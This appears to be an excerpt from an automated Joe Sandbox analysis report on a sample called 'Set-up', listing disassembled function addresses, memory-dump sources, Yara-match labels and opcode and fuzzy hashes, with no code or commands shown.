                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: ~
                                                                                                                                                  • API String ID: 0-1707062198
                                                                                                                                                  • Opcode ID: 1e06dd67d23e07e579debcd86735decd35c6d17414cf5e0452fe768e1a5eb5f4
                                                                                                                                                  • Instruction ID: b88e2cdfb42293e0d44b7ae154af6e8340cb61b370af0563ef4321cef0d41eee
                                                                                                                                                  • Opcode Fuzzy Hash: 1e06dd67d23e07e579debcd86735decd35c6d17414cf5e0452fe768e1a5eb5f4
                                                                                                                                                  • Instruction Fuzzy Hash: 78814B729042614FCB25CE28C8503AEBBD2AB85324F19C67DECB99B7D1D6359C0AD7D0
                                                                                                                                                  Function 006AEEA7 Relevance: 1.5, Strings: 1, Instructions: 256COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: LGSV
                                                                                                                                                  • API String ID: 0-2530040202
                                                                                                                                                  • Opcode ID: d9a895e57cffb3e45f7bc899b6a41e9a0c888e6f0fe25b20cec0ba8a29428f44
                                                                                                                                                  • Instruction ID: 9733d06e71004622ca4a64f17e5a1046c61d33987750903442059ade3fc2ad8a
                                                                                                                                                  • Opcode Fuzzy Hash: d9a895e57cffb3e45f7bc899b6a41e9a0c888e6f0fe25b20cec0ba8a29428f44
                                                                                                                                                  • Instruction Fuzzy Hash: 257147756083918BE318DF69846037BBBD2AF9B304F1888ADE4C69B381CA75CD058B56
                                                                                                                                                  Function 0046E22A Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_0006E1E4), ref: 0046E22F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3192549508-0
                                                                                                                                                  • Opcode ID: 2f0dcc35e2f7af509bf11e83d27bbc485d53abde26f575190c1a773d22898da0
                                                                                                                                                  • Instruction ID: 1fdd2a717cb97ed4e187c9706971acddc455a74bc21997de0517e87a278fc5f2
                                                                                                                                                  • Opcode Fuzzy Hash: 2f0dcc35e2f7af509bf11e83d27bbc485d53abde26f575190c1a773d22898da0
                                                                                                                                                  • Instruction Fuzzy Hash: DBA002B89512418F9702DF62AC095487AE0F69B70BB5141B7B94991268EF780251EE1F
                                                                                                                                                  Function 0046E23C Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32 ref: 0046E241
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3192549508-0
                                                                                                                                                  • Opcode ID: 40c49887127a3170df94af6f083223f703dfe708a5dc88237e3cb57f6cfeb3c8
                                                                                                                                                  • Instruction ID: 4f22265d44ea2fe2232677059ffa59fa0b1127c3bf87c851de1c3118201eb1f3
                                                                                                                                                  • Opcode Fuzzy Hash: 40c49887127a3170df94af6f083223f703dfe708a5dc88237e3cb57f6cfeb3c8
                                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                                  Function 006AEF57 Relevance: 1.5, Strings: 1, Instructions: 251COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: LGSV
                                                                                                                                                  • API String ID: 0-2530040202
                                                                                                                                                  • Opcode ID: da8c9f6550ffaa1b5821f55ca399044c447c6e887107e5af81a0e7150c46538d
                                                                                                                                                  • Instruction ID: 32fb2b876d0f16adfa80fa3fa60db48abd3c8bb15ca909c7764a0b51b0e26360
                                                                                                                                                  • Opcode Fuzzy Hash: da8c9f6550ffaa1b5821f55ca399044c447c6e887107e5af81a0e7150c46538d
                                                                                                                                                  • Instruction Fuzzy Hash: BD7169756083918BE319DF79847037BBBD29F9B304F18886DE4C69B381CA35CD058B56
                                                                                                                                                  Function 006AEFBB Relevance: 1.5, Strings: 1, Instructions: 250COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: LGSV
                                                                                                                                                  • API String ID: 0-2530040202
                                                                                                                                                  • Opcode ID: 99bd048e5fea5e232f081df83c3fe2e60159e57633064fbef8c65493b66a16b2
                                                                                                                                                  • Instruction ID: a2a2bd6a448ab0a4d919745fff05c2c4a5695b6029a3f20b5627d96020f1d664
                                                                                                                                                  • Opcode Fuzzy Hash: 99bd048e5fea5e232f081df83c3fe2e60159e57633064fbef8c65493b66a16b2
                                                                                                                                                  • Instruction Fuzzy Hash: A27168756083918BE318DF7984703BBBBD29F9B304F1888ADE4C69B381CA75CD058B56
                                                                                                                                                  Function 0069BE8E Relevance: 1.5, Strings: 1, Instructions: 243COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: _
                                                                                                                                                  • API String ID: 0-701932520
                                                                                                                                                  • Opcode ID: e2b37287dc388b8a95f7acb82d00d3dc35bdc6e942338e1dd3af04c504cdc7dd
                                                                                                                                                  • Instruction ID: b49d9d01ca7bff3e3363645d030f073d2c0dce3e4f15409c08d1a02cf5720cdc
                                                                                                                                                  • Opcode Fuzzy Hash: e2b37287dc388b8a95f7acb82d00d3dc35bdc6e942338e1dd3af04c504cdc7dd
                                                                                                                                                  • Instruction Fuzzy Hash: 79815C5561869009EB2CDF74889333BBAD69F84308F1D91BEC955CFB5BE638C5038749
                                                                                                                                                  Function 006AC9DE Relevance: 1.5, Strings: 1, Instructions: 236COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: "
                                                                                                                                                  • API String ID: 0-123907689
                                                                                                                                                  • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                  • Instruction ID: b636e2a9ed5237e979060b7df950a68138a99d7c529b168ebcf0cde1300a8846
                                                                                                                                                  • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                  • Instruction Fuzzy Hash: CB711632A083194BD724EE2CC88036EB7E3ABC6730F19C56EE5999B395D235DC459F81
                                                                                                                                                  Function 006B1EA5 Relevance: 1.5, Strings: 1, Instructions: 201COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 0
                                                                                                                                                  • API String ID: 0-4108050209
                                                                                                                                                  • Opcode ID: 241d467752d915ee839f3e33c9fbce1698c8a6ca174c5314e8404928a835d9a8
                                                                                                                                                  • Instruction ID: 3e8c048c91bf3c7fb6f6fdd9a769dadda83364d4e3196c3b8ecb96d0f80a7a39
                                                                                                                                                  • Opcode Fuzzy Hash: 241d467752d915ee839f3e33c9fbce1698c8a6ca174c5314e8404928a835d9a8
                                                                                                                                                  • Instruction Fuzzy Hash: 1EB1D271508FC1CAD3328A3C88587D7AFD25BA7324F484B9DD0FA8B3E2C6656106C762
                                                                                                                                                  Function 006B3F73 Relevance: 1.4, Strings: 1, Instructions: 180COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 0
                                                                                                                                                  • API String ID: 0-4108050209
                                                                                                                                                  • Opcode ID: f96018f92cb04ec83bcec452af4ce1647e5f14289958a30c67671aaf59cc4b6d
                                                                                                                                                  • Instruction ID: b6385ac6f2df3aced18b0e9fa6245e40d20985735b68ccc1f363bbc1f321d9ec
                                                                                                                                                  • Opcode Fuzzy Hash: f96018f92cb04ec83bcec452af4ce1647e5f14289958a30c67671aaf59cc4b6d
                                                                                                                                                  • Instruction Fuzzy Hash: AF911A61508FC28ED336CB3C8848656BFD21B67234F088F9DD1F64BBE6D660A106C762
                                                                                                                                                  Function 006A4FA5 Relevance: 1.4, Strings: 1, Instructions: 167COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: x%mQ
                                                                                                                                                  • API String ID: 0-2104928236
                                                                                                                                                  • Opcode ID: 9057a5057312541484b530bbbcbc288f10e2d1363fb5d0fc2c56d6d892af7196
                                                                                                                                                  • Instruction ID: 2c3a89e61e94b94eb8f5aaf69dfeea1fe09e44c5692e5ff6dbcaadda8422cd63
                                                                                                                                                  • Opcode Fuzzy Hash: 9057a5057312541484b530bbbcbc288f10e2d1363fb5d0fc2c56d6d892af7196
                                                                                                                                                  • Instruction Fuzzy Hash: 37414933A14B218BD324CF2A9C816AAB2D3ABD5314F5E817CC8559B355DA74AC028BC0
                                                                                                                                                  Function 0068F180 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: D
                                                                                                                                                  • API String ID: 0-2746444292
                                                                                                                                                  • Opcode ID: d6d45e16b15821a41262d44c95807e4a660f20609a6ed5b14e43ab6b191319a5
                                                                                                                                                  • Instruction ID: ef9c75f6e59d62159c7627474e86a1fa9304b47c2030e4eaee28d4ee950e5fd9
                                                                                                                                                  • Opcode Fuzzy Hash: d6d45e16b15821a41262d44c95807e4a660f20609a6ed5b14e43ab6b191319a5
                                                                                                                                                  • Instruction Fuzzy Hash: 265165B05093808FE3248F55C9A179BBBF1FF85708F148A5CE2894B394D3BA9548CF86
                                                                                                                                                  Function 006A49E3 Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: x%mQ
                                                                                                                                                  • API String ID: 0-2104928236
                                                                                                                                                  • Opcode ID: e055d1e13ef2fb71232227a147acc7c63370d29ef21214dce2ea53bff0a1c8a3
                                                                                                                                                  • Instruction ID: 58414f5ea6653279f7b08d64a72d7582152ecdfc6191c191ed7980cbb9939e04
                                                                                                                                                  • Opcode Fuzzy Hash: e055d1e13ef2fb71232227a147acc7c63370d29ef21214dce2ea53bff0a1c8a3
                                                                                                                                                  • Instruction Fuzzy Hash: 8D31ACBBA987288FD324AF909CC17A6F296F7D1310F19513CCE5563355EAF0AD018AC8
                                                                                                                                                  Function 006C004E Relevance: 1.3, Strings: 1, Instructions: 99COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: @
                                                                                                                                                  • API String ID: 0-2766056989
                                                                                                                                                  • Opcode ID: 8aafb78c350fd9b964c4d7f275c2db78502baeca250fa0c2fe57f3a122e7d94e
                                                                                                                                                  • Instruction ID: 27eb28fb0a9485de7964354b6a06425411ee37930e27b221e28dc90f1de0a79d
                                                                                                                                                  • Opcode Fuzzy Hash: 8aafb78c350fd9b964c4d7f275c2db78502baeca250fa0c2fe57f3a122e7d94e
                                                                                                                                                  • Instruction Fuzzy Hash: 9E3134716083048BD3249F98C8C17BBBBE6FB85310F18882CE69957350D7759849CB96
                                                                                                                                                  Function 0069CA3E Relevance: 1.3, Strings: 1, Instructions: 78COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: g
                                                                                                                                                  • API String ID: 0-3419243782
                                                                                                                                                  • Opcode ID: cbf406a8154c9317ab58560211b1e16dacc39249b30ca945619f9fc09cf4e9a5
                                                                                                                                                  • Instruction ID: 2c6d370e9125b1c944eb6d5ace819b0ac465185bca5c2632ebf92fd47a17c8d0
                                                                                                                                                  • Opcode Fuzzy Hash: cbf406a8154c9317ab58560211b1e16dacc39249b30ca945619f9fc09cf4e9a5
                                                                                                                                                  • Instruction Fuzzy Hash: E021B436750B008FC32CCF69C8D1666B7E2AB99300308D67CD4878BB59C638F80A8A44
                                                                                                                                                  Function 006995AF Relevance: 1.3, Strings: 1, Instructions: 77COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: ,
                                                                                                                                                  • API String ID: 0-3772416878
                                                                                                                                                  • Opcode ID: 175b3d3948c91bb9374f4a1a41c524aa4d030c26c35b2f7731fd715a9e94aac7
                                                                                                                                                  • Instruction ID: 7c0231a9cf43fc02bec19c8a28bb2044ae1b11c32c687ef3df3346658c187384
                                                                                                                                                  • Opcode Fuzzy Hash: 175b3d3948c91bb9374f4a1a41c524aa4d030c26c35b2f7731fd715a9e94aac7
                                                                                                                                                  • Instruction Fuzzy Hash: 6621E573A583504BD378CE35989639BB7D39BC1300F1A8A3DD89997265EE388C018787
                                                                                                                                                  Function 006A5F53 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 23
                                                                                                                                                  • API String ID: 0-326707096
                                                                                                                                                  • Opcode ID: df0d8354c8eb76ee7302fcf9dde9b18a99825166af312da8db1835d01e129be6
                                                                                                                                                  • Instruction ID: 33baaa6e15bcf3183c7ceca215583beea48f69cf9ca5e03fa3186fdaf996b0da
                                                                                                                                                  • Opcode Fuzzy Hash: df0d8354c8eb76ee7302fcf9dde9b18a99825166af312da8db1835d01e129be6
                                                                                                                                                  • Instruction Fuzzy Hash: 0811FAB000D380EFE740DFA5A48056FFBF4AB9A720F409A1CF5889B210D7749A498F4A
                                                                                                                                                  Function 00443FE0 Relevance: .7, Instructions: 713COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 6b4719c55db6b04ef2946d3aad9d222098239c220ada379453472bba9755dd93
                                                                                                                                                  • Instruction ID: 464327746d979a0f2ebb988863a8cebf6b423a9e6a6547220870a9f2f90e9dda
                                                                                                                                                  • Opcode Fuzzy Hash: 6b4719c55db6b04ef2946d3aad9d222098239c220ada379453472bba9755dd93
                                                                                                                                                  • Instruction Fuzzy Hash: 29526B706047418FE724DF29C480B5AFBE2BFC5314F148A1EE59A87791DB38E846CB5A
                                                                                                                                                  Function 0068480E Relevance: .7, Instructions: 679COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: afa396f31b2a762f308a7dd3b555ee52aa066aa6aae936bfcce488e900f6cb60
                                                                                                                                                  • Instruction ID: d0d98c710d3a1fd8d1a5c4cb3b967382a3e310c49d7eab2bfc0cbd706c7d6513
                                                                                                                                                  • Opcode Fuzzy Hash: afa396f31b2a762f308a7dd3b555ee52aa066aa6aae936bfcce488e900f6cb60
                                                                                                                                                  • Instruction Fuzzy Hash: 9E52D3716083568FCB14DF28C0906EABBE2FF88314F19866DF89A57341DB78D949CB81
                                                                                                                                                  Function 00687EFE Relevance: .7, Instructions: 665COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 7117030824d6eef071f92dd2fa6c57ff35cbd9bba8807f2e9288d75236661c67
                                                                                                                                                  • Instruction ID: 59198f4574b774fe34b8345fb3ce4e354cc64c126854f95980a94909f4f2f00b
                                                                                                                                                  • Opcode Fuzzy Hash: 7117030824d6eef071f92dd2fa6c57ff35cbd9bba8807f2e9288d75236661c67
                                                                                                                                                  • Instruction Fuzzy Hash: D052F7709087858FEB31EB24C4843E7BBE2EF55310F944A2EC5E647782DB79A885C752
                                                                                                                                                  Function 006AFAFE Relevance: .7, Instructions: 658COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 9c9625ab40efff8d822f887c8ac9d2bb95c7f5b122ab358039b62d64d5c56f2e
                                                                                                                                                  • Instruction ID: a0729989e9647720d11ce7f72f0daf50516cd73c937420acea623221b2684c41
                                                                                                                                                  • Opcode Fuzzy Hash: 9c9625ab40efff8d822f887c8ac9d2bb95c7f5b122ab358039b62d64d5c56f2e
                                                                                                                                                  • Instruction Fuzzy Hash: 266280F4611B409FD3A5CF2DC851B93BBE8EB0A710F01496EA5AEC7351D77469008FAA
                                                                                                                                                  Function 006A0CAE Relevance: .6, Instructions: 618COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 95788fa378616162f094cb3dd953eea7709f3b6192a3f0f10503893f277c360c
                                                                                                                                                  • Instruction ID: 2fa409f907855fa7f1d15c650687eed1ec2e8ae58a361655165c2c8f9d99ba99
                                                                                                                                                  • Opcode Fuzzy Hash: 95788fa378616162f094cb3dd953eea7709f3b6192a3f0f10503893f277c360c
                                                                                                                                                  • Instruction Fuzzy Hash: 8D527DB0609B809FD329CF3CC845797BFEAAB9A314F144A5DE0EE87391C77564018B66
                                                                                                                                                  Function 00456F20 Relevance: .6, Instructions: 615COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
